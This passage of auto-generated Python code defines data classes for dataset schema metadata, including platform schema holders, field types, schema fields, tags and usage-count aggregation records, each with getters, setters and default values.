self.documentSchema = documentSchema
@classmethod
def construct_with_defaults(cls) -> "KafkaSchemaClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.documentSchema = str()
@property
def documentSchema(self) -> str:
"""Getter: The native kafka document schema. This is a human readable avro document schema."""
return self._inner_dict.get('documentSchema') # type: ignore
@documentSchema.setter
def documentSchema(self, value: str) -> None:
"""Setter: The native kafka document schema. This is a human readable avro document schema."""
self._inner_dict['documentSchema'] = value
class KeyValueSchemaClass(DictWrapper):
"""Schema text of a key-value store schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.KeyValueSchema")
def __init__(self,
keySchema: str,
valueSchema: str,
):
super().__init__()
self.keySchema = keySchema
self.valueSchema = valueSchema
@classmethod
def construct_with_defaults(cls) -> "KeyValueSchemaClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.keySchema = str()
self.valueSchema = str()
@property
def keySchema(self) -> str:
"""Getter: The raw schema for the key in the key-value store."""
return self._inner_dict.get('keySchema') # type: ignore
@keySchema.setter
def keySchema(self, value: str) -> None:
"""Setter: The raw schema for the key in the key-value store."""
self._inner_dict['keySchema'] = value
@property
def valueSchema(self) -> str:
"""Getter: The raw schema for the value in the key-value store."""
return self._inner_dict.get('valueSchema') # type: ignore
@valueSchema.setter
def valueSchema(self, value: str) -> None:
"""Setter: The raw schema for the value in the key-value store."""
self._inner_dict['valueSchema'] = value
class MapTypeClass(DictWrapper):
"""Map field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.MapType")
def __init__(self,
keyType: Union[None, str]=None,
valueType: Union[None, str]=None,
):
super().__init__()
self.keyType = keyType
self.valueType = valueType
@classmethod
def construct_with_defaults(cls) -> "MapTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.keyType = self.RECORD_SCHEMA.field_map["keyType"].default
self.valueType = self.RECORD_SCHEMA.field_map["valueType"].default
@property
def keyType(self) -> Union[None, str]:
"""Getter: Key type in a map"""
return self._inner_dict.get('keyType') # type: ignore
@keyType.setter
def keyType(self, value: Union[None, str]) -> None:
"""Setter: Key type in a map"""
self._inner_dict['keyType'] = value
@property
def valueType(self) -> Union[None, str]:
"""Getter: Type of the value in a map"""
return self._inner_dict.get('valueType') # type: ignore
@valueType.setter
def valueType(self, value: Union[None, str]) -> None:
"""Setter: Type of the value in a map"""
self._inner_dict['valueType'] = value
class MySqlDDLClass(DictWrapper):
"""Schema holder for MySql data definition language that describes an MySql table."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.MySqlDDL")
def __init__(self,
tableSchema: str,
):
super().__init__()
self.tableSchema = tableSchema
@classmethod
def construct_with_defaults(cls) -> "MySqlDDLClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.tableSchema = str()
@property
def tableSchema(self) -> str:
"""Getter: The native schema in the dataset's platform. This is a human readable (json blob) table schema."""
return self._inner_dict.get('tableSchema') # type: ignore
@tableSchema.setter
def tableSchema(self, value: str) -> None:
"""Setter: The native schema in the dataset's platform. This is a human readable (json blob) table schema."""
self._inner_dict['tableSchema'] = value
class NullTypeClass(DictWrapper):
"""Null field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.NullType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "NullTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class NumberTypeClass(DictWrapper):
"""Number data type: long, integer, short, etc.."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.NumberType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "NumberTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class OracleDDLClass(DictWrapper):
"""Schema holder for oracle data definition language that describes an oracle table."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.OracleDDL")
def __init__(self,
tableSchema: str,
):
super().__init__()
self.tableSchema = tableSchema
@classmethod
def construct_with_defaults(cls) -> "OracleDDLClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.tableSchema = str()
@property
def tableSchema(self) -> str:
"""Getter: The native schema in the dataset's platform. This is a human readable (json blob) table schema."""
return self._inner_dict.get('tableSchema') # type: ignore
@tableSchema.setter
def tableSchema(self, value: str) -> None:
"""Setter: The native schema in the dataset's platform. This is a human readable (json blob) table schema."""
self._inner_dict['tableSchema'] = value
class OrcSchemaClass(DictWrapper):
"""Schema text of an ORC schema."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.OrcSchema")
def __init__(self,
schema: str,
):
super().__init__()
self.schema = schema
@classmethod
def construct_with_defaults(cls) -> "OrcSchemaClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.schema = str()
@property
def schema(self) -> str:
"""Getter: The native schema for ORC file format."""
return self._inner_dict.get('schema') # type: ignore
@schema.setter
def schema(self, value: str) -> None:
"""Setter: The native schema for ORC file format."""
self._inner_dict['schema'] = value
class OtherSchemaClass(DictWrapper):
"""Schema holder for undefined schema types."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.OtherSchema")
def __init__(self,
rawSchema: str,
):
super().__init__()
self.rawSchema = rawSchema
@classmethod
def construct_with_defaults(cls) -> "OtherSchemaClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.rawSchema = str()
@property
def rawSchema(self) -> str:
"""Getter: The native schema in the dataset's platform."""
return self._inner_dict.get('rawSchema') # type: ignore
@rawSchema.setter
def rawSchema(self, value: str) -> None:
"""Setter: The native schema in the dataset's platform."""
self._inner_dict['rawSchema'] = value
class PrestoDDLClass(DictWrapper):
"""Schema holder for presto data definition language that describes a presto view."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.PrestoDDL")
def __init__(self,
rawSchema: str,
):
super().__init__()
self.rawSchema = rawSchema
@classmethod
def construct_with_defaults(cls) -> "PrestoDDLClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.rawSchema = str()
@property
def rawSchema(self) -> str:
"""Getter: The raw schema in the dataset's platform. This includes the DDL and the columns extracted from DDL."""
return self._inner_dict.get('rawSchema') # type: ignore
@rawSchema.setter
def rawSchema(self, value: str) -> None:
"""Setter: The raw schema in the dataset's platform. This includes the DDL and the columns extracted from DDL."""
self._inner_dict['rawSchema'] = value
class RecordTypeClass(DictWrapper):
"""Record field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.RecordType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "RecordTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class SchemaFieldClass(DictWrapper):
"""SchemaField to describe metadata related to dataset schema. Schema normalization rules: http://go/tms-schema"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.SchemaField")
def __init__(self,
fieldPath: str,
type: "SchemaFieldDataTypeClass",
nativeDataType: str,
jsonPath: Union[None, str]=None,
nullable: Optional[bool]=None,
description: Union[None, str]=None,
recursive: Optional[bool]=None,
globalTags: Union[None, "GlobalTagsClass"]=None,
glossaryTerms: Union[None, "GlossaryTermsClass"]=None,
):
super().__init__()
self.fieldPath = fieldPath
self.jsonPath = jsonPath
if nullable is None:
# default: False
self.nullable = self.RECORD_SCHEMA.field_map["nullable"].default
else:
self.nullable = nullable
self.description = description
self.type = type
self.nativeDataType = nativeDataType
if recursive is None:
# default: False
self.recursive = self.RECORD_SCHEMA.field_map["recursive"].default
else:
self.recursive = recursive
self.globalTags = globalTags
self.glossaryTerms = glossaryTerms
@classmethod
def construct_with_defaults(cls) -> "SchemaFieldClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.fieldPath = str()
self.jsonPath = self.RECORD_SCHEMA.field_map["jsonPath"].default
self.nullable = self.RECORD_SCHEMA.field_map["nullable"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.type = SchemaFieldDataTypeClass.construct_with_defaults()
self.nativeDataType = str()
self.recursive = self.RECORD_SCHEMA.field_map["recursive"].default
self.globalTags = self.RECORD_SCHEMA.field_map["globalTags"].default
self.glossaryTerms = self.RECORD_SCHEMA.field_map["glossaryTerms"].default
@property
def fieldPath(self) -> str:
"""Getter: Flattened name of the field. Field is computed from jsonPath field. For data translation rules refer to wiki page above."""
return self._inner_dict.get('fieldPath') # type: ignore
@fieldPath.setter
def fieldPath(self, value: str) -> None:
"""Setter: Flattened name of the field. Field is computed from jsonPath field. For data translation rules refer to wiki page above."""
self._inner_dict['fieldPath'] = value
@property
def jsonPath(self) -> Union[None, str]:
"""Getter: Flattened name of a field in JSON Path notation."""
return self._inner_dict.get('jsonPath') # type: ignore
@jsonPath.setter
def jsonPath(self, value: Union[None, str]) -> None:
"""Setter: Flattened name of a field in JSON Path notation."""
self._inner_dict['jsonPath'] = value
@property
def nullable(self) -> bool:
"""Getter: Indicates if this field is optional or nullable"""
return self._inner_dict.get('nullable') # type: ignore
@nullable.setter
def nullable(self, value: bool) -> None:
"""Setter: Indicates if this field is optional or nullable"""
self._inner_dict['nullable'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Description"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Description"""
self._inner_dict['description'] = value
@property
def type(self) -> "SchemaFieldDataTypeClass":
"""Getter: Platform independent field type of the field."""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: "SchemaFieldDataTypeClass") -> None:
"""Setter: Platform independent field type of the field."""
self._inner_dict['type'] = value
@property
def nativeDataType(self) -> str:
"""Getter: The native type of the field in the dataset's platform as declared by platform schema."""
return self._inner_dict.get('nativeDataType') # type: ignore
@nativeDataType.setter
def nativeDataType(self, value: str) -> None:
"""Setter: The native type of the field in the dataset's platform as declared by platform schema."""
self._inner_dict['nativeDataType'] = value
@property
def recursive(self) -> bool:
"""Getter: There are use cases when a field in type B references type A. A field in A references field of type B. In such cases, we will mark the first field as recursive."""
return self._inner_dict.get('recursive') # type: ignore
@recursive.setter
def recursive(self, value: bool) -> None:
"""Setter: There are use cases when a field in type B references type A. A field in A references field of type B. In such cases, we will mark the first field as recursive."""
self._inner_dict['recursive'] = value
@property
def globalTags(self) -> Union[None, "GlobalTagsClass"]:
"""Getter: Tags associated with the field"""
return self._inner_dict.get('globalTags') # type: ignore
@globalTags.setter
def globalTags(self, value: Union[None, "GlobalTagsClass"]) -> None:
"""Setter: Tags associated with the field"""
self._inner_dict['globalTags'] = value
@property
def glossaryTerms(self) -> Union[None, "GlossaryTermsClass"]:
"""Getter: Glossary terms associated with the field"""
return self._inner_dict.get('glossaryTerms') # type: ignore
@glossaryTerms.setter
def glossaryTerms(self, value: Union[None, "GlossaryTermsClass"]) -> None:
"""Setter: Glossary terms associated with the field"""
self._inner_dict['glossaryTerms'] = value
class SchemaFieldDataTypeClass(DictWrapper):
"""Schema field data types"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.SchemaFieldDataType")
def __init__(self,
type: Union["BooleanTypeClass", "FixedTypeClass", "StringTypeClass", "BytesTypeClass", "NumberTypeClass", "DateTypeClass", "TimeTypeClass", "EnumTypeClass", "NullTypeClass", "MapTypeClass", "ArrayTypeClass", "UnionTypeClass", "RecordTypeClass"],
):
super().__init__()
self.type = type
@classmethod
def construct_with_defaults(cls) -> "SchemaFieldDataTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.type = BooleanTypeClass.construct_with_defaults()
@property
def type(self) -> Union["BooleanTypeClass", "FixedTypeClass", "StringTypeClass", "BytesTypeClass", "NumberTypeClass", "DateTypeClass", "TimeTypeClass", "EnumTypeClass", "NullTypeClass", "MapTypeClass", "ArrayTypeClass", "UnionTypeClass", "RecordTypeClass"]:
"""Getter: Data platform specific types"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union["BooleanTypeClass", "FixedTypeClass", "StringTypeClass", "BytesTypeClass", "NumberTypeClass", "DateTypeClass", "TimeTypeClass", "EnumTypeClass", "NullTypeClass", "MapTypeClass", "ArrayTypeClass", "UnionTypeClass", "RecordTypeClass"]) -> None:
"""Setter: Data platform specific types"""
self._inner_dict['type'] = value
class SchemaMetadataClass(DictWrapper):
"""SchemaMetadata to describe metadata related to store schema"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.SchemaMetadata")
def __init__(self,
schemaName: str,
platform: str,
version: int,
hash: str,
platformSchema: Union["EspressoSchemaClass", "OracleDDLClass", "MySqlDDLClass", "PrestoDDLClass", "KafkaSchemaClass", "BinaryJsonSchemaClass", "OrcSchemaClass", "SchemalessClass", "KeyValueSchemaClass", "OtherSchemaClass"],
fields: List["SchemaFieldClass"],
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
dataset: Union[None, str]=None,
cluster: Union[None, str]=None,
primaryKeys: Union[None, List[str]]=None,
foreignKeysSpecs: Union[None, Dict[str, "ForeignKeySpecClass"]]=None,
):
super().__init__()
self.schemaName = schemaName
self.platform = platform
self.version = version
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.dataset = dataset
self.cluster = cluster
self.hash = hash
self.platformSchema = platformSchema
self.fields = fields
self.primaryKeys = primaryKeys
self.foreignKeysSpecs = foreignKeysSpecs
@classmethod
def construct_with_defaults(cls) -> "SchemaMetadataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.schemaName = str()
self.platform = str()
self.version = int()
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.dataset = self.RECORD_SCHEMA.field_map["dataset"].default
self.cluster = self.RECORD_SCHEMA.field_map["cluster"].default
self.hash = str()
self.platformSchema = EspressoSchemaClass.construct_with_defaults()
self.fields = list()
self.primaryKeys = self.RECORD_SCHEMA.field_map["primaryKeys"].default
self.foreignKeysSpecs = self.RECORD_SCHEMA.field_map["foreignKeysSpecs"].default
@property
def schemaName(self) -> str:
"""Getter: Schema name e.g. PageViewEvent, identity.Profile, ams.account_management_tracking"""
return self._inner_dict.get('schemaName') # type: ignore
@schemaName.setter
def schemaName(self, value: str) -> None:
"""Setter: Schema name e.g. PageViewEvent, identity.Profile, ams.account_management_tracking"""
self._inner_dict['schemaName'] = value
@property
def platform(self) -> str:
"""Getter: Standardized platform urn where schema is defined. The data platform Urn (urn:li:platform:{platform_name})"""
return self._inner_dict.get('platform') # type: ignore
@platform.setter
def platform(self, value: str) -> None:
"""Setter: Standardized platform urn where schema is defined. The data platform Urn (urn:li:platform:{platform_name})"""
self._inner_dict['platform'] = value
@property
def version(self) -> int:
"""Getter: Every change to SchemaMetadata in the resource results in a new version. Version is server assigned. This version is differ from platform native schema version."""
return self._inner_dict.get('version') # type: ignore
@version.setter
def version(self, value: int) -> None:
"""Setter: Every change to SchemaMetadata in the resource results in a new version. Version is server assigned. This version is differ from platform native schema version."""
self._inner_dict['version'] = value
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def dataset(self) -> Union[None, str]:
"""Getter: Dataset this schema metadata is associated with."""
return self._inner_dict.get('dataset') # type: ignore
@dataset.setter
def dataset(self, value: Union[None, str]) -> None:
"""Setter: Dataset this schema metadata is associated with."""
self._inner_dict['dataset'] = value
@property
def cluster(self) -> Union[None, str]:
"""Getter: The cluster this schema metadata resides from"""
return self._inner_dict.get('cluster') # type: ignore
@cluster.setter
def cluster(self, value: Union[None, str]) -> None:
"""Setter: The cluster this schema metadata resides from"""
self._inner_dict['cluster'] = value
@property
def hash(self) -> str:
"""Getter: the SHA1 hash of the schema content"""
return self._inner_dict.get('hash') # type: ignore
@hash.setter
def hash(self, value: str) -> None:
"""Setter: the SHA1 hash of the schema content"""
self._inner_dict['hash'] = value
@property
def platformSchema(self) -> Union["EspressoSchemaClass", "OracleDDLClass", "MySqlDDLClass", "PrestoDDLClass", "KafkaSchemaClass", "BinaryJsonSchemaClass", "OrcSchemaClass", "SchemalessClass", "KeyValueSchemaClass", "OtherSchemaClass"]:
"""Getter: The native schema in the dataset's platform."""
return self._inner_dict.get('platformSchema') # type: ignore
@platformSchema.setter
def platformSchema(self, value: Union["EspressoSchemaClass", "OracleDDLClass", "MySqlDDLClass", "PrestoDDLClass", "KafkaSchemaClass", "BinaryJsonSchemaClass", "OrcSchemaClass", "SchemalessClass", "KeyValueSchemaClass", "OtherSchemaClass"]) -> None:
"""Setter: The native schema in the dataset's platform."""
self._inner_dict['platformSchema'] = value
@property
def fields(self) -> List["SchemaFieldClass"]:
"""Getter: Client provided a list of fields from document schema."""
return self._inner_dict.get('fields') # type: ignore
@fields.setter
def fields(self, value: List["SchemaFieldClass"]) -> None:
"""Setter: Client provided a list of fields from document schema."""
self._inner_dict['fields'] = value
@property
def primaryKeys(self) -> Union[None, List[str]]:
"""Getter: Client provided list of fields that define primary keys to access record. Field order defines hierarchical espresso keys. Empty lists indicates absence of primary key access patter. Value is a SchemaField@fieldPath."""
return self._inner_dict.get('primaryKeys') # type: ignore
@primaryKeys.setter
def primaryKeys(self, value: Union[None, List[str]]) -> None:
"""Setter: Client provided list of fields that define primary keys to access record. Field order defines hierarchical espresso keys. Empty lists indicates absence of primary key access patter. Value is a SchemaField@fieldPath."""
self._inner_dict['primaryKeys'] = value
@property
def foreignKeysSpecs(self) -> Union[None, Dict[str, "ForeignKeySpecClass"]]:
"""Getter: Map captures all the references schema makes to external datasets. Map key is ForeignKeySpecName typeref."""
return self._inner_dict.get('foreignKeysSpecs') # type: ignore
@foreignKeysSpecs.setter
def foreignKeysSpecs(self, value: Union[None, Dict[str, "ForeignKeySpecClass"]]) -> None:
"""Setter: Map captures all the references schema makes to external datasets. Map key is ForeignKeySpecName typeref."""
self._inner_dict['foreignKeysSpecs'] = value
class SchemalessClass(DictWrapper):
"""The dataset has no specific schema associated with it"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.Schemaless")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "SchemalessClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class StringTypeClass(DictWrapper):
"""String field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.StringType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "StringTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class TimeTypeClass(DictWrapper):
"""Time field type. This should also be used for datetimes."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.TimeType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "TimeTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class UnionTypeClass(DictWrapper):
"""Union field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.UnionType")
def __init__(self,
nestedTypes: Union[None, List[str]]=None,
):
super().__init__()
self.nestedTypes = nestedTypes
@classmethod
def construct_with_defaults(cls) -> "UnionTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.nestedTypes = self.RECORD_SCHEMA.field_map["nestedTypes"].default
@property
def nestedTypes(self) -> Union[None, List[str]]:
"""Getter: List of types in union type."""
return self._inner_dict.get('nestedTypes') # type: ignore
@nestedTypes.setter
def nestedTypes(self, value: Union[None, List[str]]) -> None:
"""Setter: List of types in union type."""
self._inner_dict['nestedTypes'] = value
class UrnForeignKeyClass(DictWrapper):
"""If SchemaMetadata fields make any external references and references are of type com.linkedin.pegasus2avro.common.Urn or any children, this models can be used to mark it."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.UrnForeignKey")
def __init__(self,
currentFieldPath: str,
):
super().__init__()
self.currentFieldPath = currentFieldPath
@classmethod
def construct_with_defaults(cls) -> "UrnForeignKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.currentFieldPath = str()
@property
def currentFieldPath(self) -> str:
"""Getter: Field in hosting(current) SchemaMetadata."""
return self._inner_dict.get('currentFieldPath') # type: ignore
@currentFieldPath.setter
def currentFieldPath(self, value: str) -> None:
"""Setter: Field in hosting(current) SchemaMetadata."""
self._inner_dict['currentFieldPath'] = value
class TagPropertiesClass(DictWrapper):
"""Properties associated with a Tag"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.tag.TagProperties")
def __init__(self,
name: str,
description: Union[None, str]=None,
):
super().__init__()
self.name = name
self.description = description
@classmethod
def construct_with_defaults(cls) -> "TagPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
self.description = self.RECORD_SCHEMA.field_map["description"].default
@property
def name(self) -> str:
"""Getter: Name of the tag"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Name of the tag"""
self._inner_dict['name'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the tag"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the tag"""
self._inner_dict['description'] = value
class FieldUsageCountsClass(DictWrapper):
""" Records field-level usage counts for a given resource """
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.usage.FieldUsageCounts")
def __init__(self,
fieldName: str,
count: int,
):
super().__init__()
self.fieldName = fieldName
self.count = count
@classmethod
def construct_with_defaults(cls) -> "FieldUsageCountsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.fieldName = str()
self.count = int()
@property
def fieldName(self) -> str:
# No docs available.
return self._inner_dict.get('fieldName') # type: ignore
@fieldName.setter
def fieldName(self, value: str) -> None:
# No docs available.
self._inner_dict['fieldName'] = value
@property
def count(self) -> int:
# No docs available.
return self._inner_dict.get('count') # type: ignore
@count.setter
def count(self, value: int) -> None:
# No docs available.
self._inner_dict['count'] = value
class UsageAggregationClass(DictWrapper):
"""Usage data for a given resource, rolled up into a bucket."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.usage.UsageAggregation")
def __init__(self,
bucket: int,
duration: Union[str, "WindowDurationClass"],
resource: str,
metrics: "UsageAggregationMetricsClass",
):
super().__init__()
self.bucket = bucket
self.duration = duration
self.resource = resource
self.metrics = metrics
@classmethod
def construct_with_defaults(cls) -> "UsageAggregationClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.bucket = int()
self.duration = WindowDurationClass.YEAR
self.resource = str()
self.metrics = UsageAggregationMetricsClass.construct_with_defaults()
@property
def bucket(self) -> int:
"""Getter: Bucket start time in milliseconds """
return self._inner_dict.get('bucket') # type: ignore
@bucket.setter
def bucket(self, value: int) -> None:
"""Setter: Bucket start time in milliseconds """
self._inner_dict['bucket'] = value
@property
def duration(self) -> Union[str, "WindowDurationClass"]:
"""Getter: Bucket duration """
return self._inner_dict.get('duration') # type: ignore
@duration.setter
def duration(self, value: Union[str, "WindowDurationClass"]) -> None:
"""Setter: Bucket duration """
self._inner_dict['duration'] = value
@property
def resource(self) -> str:
"""Getter: Resource associated with these usage stats """
return self._inner_dict.get('resource') # type: ignore
@resource.setter
def resource(self, value: str) -> None:
"""Setter: Resource associated with these usage stats """
self._inner_dict['resource'] = value
@property
def metrics(self) -> "UsageAggregationMetricsClass":
"""Getter: Metrics associated with this bucket """
return self._inner_dict.get('metrics') # type: ignore
@metrics.setter
def metrics(self, value: "UsageAggregationMetricsClass") -> None:
"""Setter: Metrics associated with this bucket """
self._inner_dict['metrics'] = value
class UsageAggregationMetricsClass(DictWrapper):
"""Metrics for usage data for a given resource and bucket. Not all fields
make sense for all buckets, so every field is optional."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.usage.UsageAggregationMetrics")
def __init__(self,
uniqueUserCount: Union[None, int]=None,
users: Union[None, List["UserUsageCountsClass"]]=None,
totalSqlQueries: Union[None, int]=None,
topSqlQueries: Union[None, List[str]]=None,
fields: Union[None, List["FieldUsageCountsClass"]]=None,
):
super().__init__()
self.uniqueUserCount = uniqueUserCount
self.users = users
self.totalSqlQueries = totalSqlQueries
self.topSqlQueries = topSqlQueries
self.fields = fields
@classmethod
def construct_with_defaults(cls) -> "UsageAggregationMetricsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.uniqueUserCount = self.RECORD_SCHEMA.field_map["uniqueUserCount"].default
self.users = self.RECORD_SCHEMA.field_map["users"].default
self.totalSqlQueries = self.RECORD_SCHEMA.field_map["totalSqlQueries"].default
self.topSqlQueries = self.RECORD_SCHEMA.field_map["topSqlQueries"].default
self.fields = self.RECORD_SCHEMA.field_map["fields"].default
@property
def uniqueUserCount(self) -> Union[None, int]:
"""Getter: Unique user count """
return self._inner_dict.get('uniqueUserCount') # type: ignore
@uniqueUserCount.setter
def uniqueUserCount(self, value: Union[None, int]) -> None:
"""Setter: Unique user count """
self._inner_dict['uniqueUserCount'] = value
@property
def users(self) -> Union[None, List["UserUsageCountsClass"]]:
"""Getter: Users within this bucket, with frequency counts """
return self._inner_dict.get('users') # type: ignore
@users.setter
def users(self, value: Union[None, List["UserUsageCountsClass"]]) -> None:
"""Setter: Users within this bucket, with frequency counts """
self._inner_dict['users'] = value
@property
def totalSqlQueries(self) -> Union[None, int]:
"""Getter: Total SQL query count """
return self._inner_dict.get('totalSqlQueries') # type: ignore
@totalSqlQueries.setter
def totalSqlQueries(self, value: Union[None, int]) -> None:
"""Setter: Total SQL query count """
self._inner_dict['totalSqlQueries'] = value
@property
def topSqlQueries(self) -> Union[None, List[str]]:
"""Getter: Frequent SQL queries; mostly makes sense for datasets in SQL databases """
return self._inner_dict.get('topSqlQueries') # type: ignore
@topSqlQueries.setter
def topSqlQueries(self, value: Union[None, List[str]]) -> None:
"""Setter: Frequent SQL queries; mostly makes sense for datasets in SQL databases """
self._inner_dict['topSqlQueries'] = value
@property
def fields(self) -> Union[None, List["FieldUsageCountsClass"]]:
"""Getter: Field-level usage stats """
return self._inner_dict.get('fields') # type: ignore
@fields.setter
def fields(self, value: Union[None, List["FieldUsageCountsClass"]]) -> None:
"""Setter: Field-level usage stats """
self._inner_dict['fields'] = value
class UserUsageCountsClass(DictWrapper):
""" Records a single user's usage counts for a given resource """
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.usage.UserUsageCounts")
def __init__(self,
count: int,
user: Union[None, str]=None,
userEmail: Union[None, str]=None,
):
super().__init__()
self.user = user
self.count = count
self.userEmail = userEmail
@classmethod
def construct_with_defaults(cls) -> "UserUsageCountsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.user = self.RECORD_SCHEMA.field_map["user"].default
self.count = int()
self.userEmail = self.RECORD_SCHEMA.field_map["userEmail"].default
@property
def user(self) -> Union[None, str]:
# No docs available.
return self._inner_dict.get('user') # type: ignore
@user.setter
def user(self, value: Union[None, str]) -> None:
# No docs available.
self._inner_dict['user'] = value
@property
def count(self) -> int:
# No docs available.
return self._inner_dict.get('count') # type: ignore
@count.setter
def count(self, value: int) -> None:
# No docs available.
